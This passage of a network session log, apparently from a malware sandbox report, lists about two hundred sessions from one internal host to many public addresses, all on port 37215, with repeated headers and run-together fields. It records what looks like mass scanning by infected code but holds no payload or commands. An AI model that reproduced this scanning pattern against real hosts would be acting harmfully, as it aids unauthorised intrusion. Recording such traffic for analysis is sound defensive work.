                                                  12851192.168.2.1350614135.5.238.25537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12852192.168.2.1360332157.225.178.24037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12853192.168.2.1358494136.71.86.6437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12854192.168.2.1349518157.212.238.6637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12855192.168.2.1348554197.252.187.1737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12856192.168.2.133920441.61.66.2737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12857192.168.2.1335826157.65.59.17437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12858192.168.2.1335022197.11.144.6937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12859192.168.2.1337352157.51.75.3837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12860192.168.2.1342332157.166.39.3137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12861192.168.2.1352288197.139.169.2737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12862192.168.2.134581441.169.141.7337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12863192.168.2.134123041.90.36.20437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12864192.168.2.1352658197.72.103.17837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12865192.168.2.135762441.184.37.1037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12866192.168.2.134162841.40.58.337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12867192.168.2.1340862207.31.2.11537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12868192.168.2.1353060157.204.253.23337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12869192.168.2.1345982197.150.1.1237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12870192.168.2.1346802157.30.56.2137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12871192.168.2.134627641.200.6.21537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12872192.168.2.135182041.127.162.1937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12873192.168.2.134977041.127.66.9537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12874192.168.2.135608041.237.6.23537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12875192.168.2.1346218157.251.221.12237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12876192.168.2.1349386157.117.208.9437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12877192.168.2.1338888202.208.51.22537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12878192.168.2.1345274157.159.18.12337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12879192.168.2.1358078157.70.234.21237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12880192.168.2.1354378197.40.210.24137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12881192.168.2.133290641.199.215.4437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12882192.168.2.1352492197.65.55.16737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12883192.168.2.134017641.22.161.2537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12884192.168.2.136086641.252.185.6137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12885192.168.2.1360368157.185.127.17837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12886192.168.2.1349526197.10.251.12637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12887192.168.2.135143634.174.213.537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12888192.168.2.1338306161.224.14.7337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12889192.168.2.134184841.231.223.18337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12890192.168.2.135177452.10.82.7137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12891192.168.2.134179041.165.226.13837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12892192.168.2.135945441.2.205.16237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12893192.168.2.1351400197.195.185.23937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12894192.168.2.1342598197.124.226.2537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12895192.168.2.1340184157.60.71.8237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12896192.168.2.1337936157.166.230.12537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12897192.168.2.1346912197.54.171.11737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12898192.168.2.135902641.195.22.11137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12899192.168.2.1345704123.30.24.12437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12900192.168.2.1343168197.254.23.21237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12901192.168.2.1338218118.236.74.16537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12902192.168.2.134096841.51.40.15137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12903192.168.2.1337794157.145.165.13237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12904192.168.2.1338986221.22.108.9537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12905192.168.2.134441641.92.64.8237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12906192.168.2.1344222197.202.66.14937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12907192.168.2.135652641.5.169.17337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12908192.168.2.134289441.150.77.2337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12909192.168.2.134139441.4.100.7237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12910192.168.2.1342154157.216.14.1637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12911192.168.2.1333426139.226.184.3337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12912192.168.2.1358764157.156.225.8637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12913192.168.2.134277264.215.178.17837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12914192.168.2.1336636197.69.161.737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12915192.168.2.1360264157.43.84.14837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12916192.168.2.1351790108.198.255.4937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12917192.168.2.1343232197.101.160.24837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12918192.168.2.1345806121.186.94.24537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12919192.168.2.1342948197.250.152.13737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12920192.168.2.1348666157.181.209.20337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12921192.168.2.134243641.79.43.12937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12922192.168.2.1344816157.117.205.8737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12923192.168.2.133721498.166.111.12337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12924192.168.2.1359534176.89.62.7637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12925192.168.2.1341336197.238.248.2537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12926192.168.2.1347176183.195.113.16137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12927192.168.2.135497461.56.127.5337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12928192.168.2.1337490223.108.103.13537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12929192.168.2.136002841.235.81.10037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12930192.168.2.135433041.193.110.22637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12931192.168.2.1341012157.4.237.2537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12932192.168.2.1341876197.54.112.20137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12933192.168.2.1354952157.137.152.4237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12934192.168.2.134020819.78.196.9337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12935192.168.2.1354400197.209.180.20537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12936192.168.2.134794041.71.45.15437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12937192.168.2.1341456197.163.132.24237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12938192.168.2.1348756101.198.136.9637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12939192.168.2.1346816197.187.116.13637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12940192.168.2.1355784197.131.18.737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12941192.168.2.1351344157.92.160.23537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12942192.168.2.1350764209.23.89.10337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12943192.168.2.134983241.158.195.5737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12944192.168.2.134274641.159.201.19137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12945192.168.2.1350458151.126.8.4537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12946192.168.2.135970249.108.2.6537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12947192.168.2.1336834197.30.133.15137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12948192.168.2.1335292202.93.156.15337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12949192.168.2.135126841.93.139.19837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12950192.168.2.1359574208.190.196.16037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12951192.168.2.1350496205.218.2.11937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12952192.168.2.1347202197.234.9.16937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12953192.168.2.1346232157.243.116.5237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12954192.168.2.1339032197.106.179.20237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12955192.168.2.1342036197.236.16.23037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12956192.168.2.1337172197.175.38.18137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12957192.168.2.135168441.226.45.17137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12958192.168.2.1348380185.109.85.15837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12959192.168.2.1345378197.63.17.21937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12960192.168.2.134732841.215.235.19537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12961192.168.2.135816841.157.32.18837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12962192.168.2.1360452157.112.30.9337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12963192.168.2.1350000157.97.0.5437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12964192.168.2.1343786218.151.177.7437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12965192.168.2.134573277.231.116.20137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12966192.168.2.1347622157.144.230.6737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12967192.168.2.1335944115.230.212.15737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12968192.168.2.135044241.7.228.19837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12969192.168.2.1350758185.86.110.6637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12970192.168.2.1347458197.203.145.17737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12971192.168.2.1333146157.180.201.16137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12972192.168.2.135268812.83.100.14137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12973192.168.2.133679096.25.50.17037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12974192.168.2.1345292141.0.185.6337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12975192.168.2.1350704197.169.24.5037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12976192.168.2.1360810197.215.185.3137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12977192.168.2.1356308197.1.88.7537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12978192.168.2.1360210157.204.159.19437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12979192.168.2.134261041.221.128.5937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12980192.168.2.1348678157.183.55.23737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12981192.168.2.1355168197.100.217.17937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12982192.168.2.134307863.137.170.14837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12983192.168.2.1336980146.215.119.18237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12984192.168.2.133847441.101.30.17937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12985192.168.2.1339852197.231.236.25537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12986192.168.2.1349248175.35.165.3537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12987192.168.2.1343072157.193.231.22337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12988192.168.2.1337256157.78.202.20237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12989192.168.2.1335456103.251.162.13037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12990192.168.2.1342964157.171.213.1737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12991192.168.2.133465866.26.108.14037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12992192.168.2.1332934157.182.73.9037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12993192.168.2.1334150164.163.57.14137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12994192.168.2.1358502197.158.117.2437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12995192.168.2.1333132197.52.174.17437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12996192.168.2.135919241.83.144.24937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12997192.168.2.135071441.161.10.14737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12998192.168.2.135641441.99.123.3837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12999192.168.2.1359288157.243.18.2537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13000192.168.2.135237241.207.209.14537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13001192.168.2.134819041.27.210.18037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13002192.168.2.1358456197.230.57.14737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13003192.168.2.1349872197.141.125.25137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13004192.168.2.1340582150.56.188.14837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13005192.168.2.1356510157.223.20.16137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13006192.168.2.1333304157.63.244.15537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13007192.168.2.1346884197.62.247.12837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13008192.168.2.1335450165.120.12.11137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13009192.168.2.133351641.219.229.9337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13010192.168.2.135750641.233.73.20737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13011192.168.2.1335638157.197.153.20837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13012192.168.2.134188641.12.131.21037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13013192.168.2.135339841.37.3.16637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13014192.168.2.1345458157.235.136.18137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13015192.168.2.1343254106.180.210.15037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13016192.168.2.1333892197.244.133.6937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13017192.168.2.1341468165.112.156.19237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13018192.168.2.1341656157.220.19.1037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13019192.168.2.135449641.227.165.9137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13020192.168.2.1359538157.157.211.18437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13021192.168.2.134204241.65.142.25437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13022192.168.2.1352228157.159.52.24937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13023192.168.2.1354210190.225.99.20737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13024192.168.2.1358778157.119.127.20237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13025192.168.2.1350064197.107.200.15137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13026192.168.2.133472089.3.223.8937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13027192.168.2.1340130197.196.134.13737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13028192.168.2.1353660197.197.142.9937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13029192.168.2.1343590155.196.112.237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13030192.168.2.1349520139.136.73.21437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13031192.168.2.1350564197.243.155.3937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13032192.168.2.1346326197.166.202.7637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13033192.168.2.134589820.203.169.13137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13034192.168.2.134226041.44.35.10837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13035192.168.2.1338430112.4.70.16237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13036192.168.2.135756241.62.157.7037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13037192.168.2.1334908197.152.202.19837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13038192.168.2.1349440157.61.55.14237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13039192.168.2.1339012197.77.253.13037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13040192.168.2.1336572158.4.86.13137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13041192.168.2.1359518157.84.152.5037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13042192.168.2.1342690157.12.165.8037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13043192.168.2.1341092157.203.199.24837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13044192.168.2.1344922197.8.76.5337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13045192.168.2.1346640157.7.61.8237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13046192.168.2.1335304197.142.136.7437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13047192.168.2.1344154197.148.217.4037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13048192.168.2.1348892197.112.21.24837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13049192.168.2.133942841.67.27.537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13050192.168.2.1352124157.14.40.3737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13051192.168.2.1359674197.176.141.17337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13052192.168.2.134002641.139.29.25137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13053192.168.2.1354324157.219.90.637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13054192.168.2.1354432197.59.158.6737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13055192.168.2.1347948197.77.225.2437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13056192.168.2.135896013.41.149.18237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13057192.168.2.134329641.63.131.18137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13058192.168.2.1341036157.131.65.17837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13059192.168.2.135780641.190.192.4037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13060192.168.2.135340041.174.148.25537215
